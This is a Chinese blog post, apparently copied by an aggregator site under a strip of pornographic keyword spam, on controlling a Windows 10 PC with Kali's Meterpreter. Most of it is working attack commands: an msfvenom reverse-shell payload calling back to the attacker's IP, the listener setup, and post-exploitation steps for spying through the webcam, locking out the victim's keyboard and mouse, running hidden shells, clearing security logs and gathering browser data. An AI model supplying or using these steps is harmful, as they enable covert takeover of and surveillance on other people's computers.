日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

用kali的Meterpreter控制win10,可以偷看你的电脑的所有数据

發布時間:2024/10/8 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 用kali的Meterpreter控制win10,可以偷看你的电脑的所有数据 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Meterpreter

Meterpreter是Metasploit框架中的一個擴展模塊,作為溢出成功以后的攻擊載荷使用,攻擊載荷在溢出攻擊成功以后給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個Meterpreter shell的鏈接。Meterpreter shell作為滲透模塊有很多有用的功能,比如添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、得到遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。

查看kali和window的ip

在kali終端ifconfig,ip是192.168.0.103

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=5555 -f exe -o met.exe

生成met.exe可執行的exe,并點擊執行。

復制到win10主機,需要關閉window的防火墻

window點擊exe前,kali需要進入msfconsole, 5555需要對應

msfconsole msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.0.103 lhost => 192.168.0.103 msf5 exploit(multi/handler) > set lport 5555 lport => 5555

exploit命令發起攻擊

在window桌面不小心放在重要的文件,直接cat查詢

補充下,msfconsole的一些命令,只有控制了window,下面的命令都可以執行。

# 讓他不能用鼠標 uictl開關鍵盤/鼠標 uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/鼠標 uictl disable mouse #禁用鼠標 uictl disable keyboard #禁用鍵盤# 如果開了攝像頭拍照 webcam攝像頭命令 webcam_list #查看攝像頭 webcam_snap #通過攝像頭拍照 webcam_stream #通過攝像頭開啟視頻 execute執行文件 execute #在目標機中執行文件 execute -H -i -f cmd.exe # 創建新進程cmd.exe,-H不可見,-i交互# clearav清除日志 clearav #清除windows中的應用程序日志、系統日志、安全日志# 基本網絡命令 ipconfig/ifconfig netstat –ano arp getproxy #查看代理信息 route #查看路由# 信息收集的腳本位于:/usr/share/metasploit-framework/modules/post/windows/gather /usr/share/metasploit-framework/modules/post/linux/gather# 信息收集的腳本較多,僅列幾個常用的:run post/windows/gather/checkvm #是否虛擬機 run post/linux/gather/checkvm #是否虛擬機 run post/windows/gather/forensics/enum_drives #查看分區 run post/windows/gather/enum_applications #獲取安裝軟件信息 run post/windows/gather/dumplinks #獲取最近的文件操作 run post/windows/gather/enum_ie #獲取IE緩存 run post/windows/gather/enum_chrome #獲取Chrome緩存 run post/windows/gather/enum_patches #補丁信息 run post/windows/gather/enum_domain #查找域控

其實很弄別人是不行的,別人怎么會傻傻的關防火墻。

總結

以上是生活随笔為你收集整理的用kali的Meterpreter控制win10,可以偷看你的电脑的所有数据的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。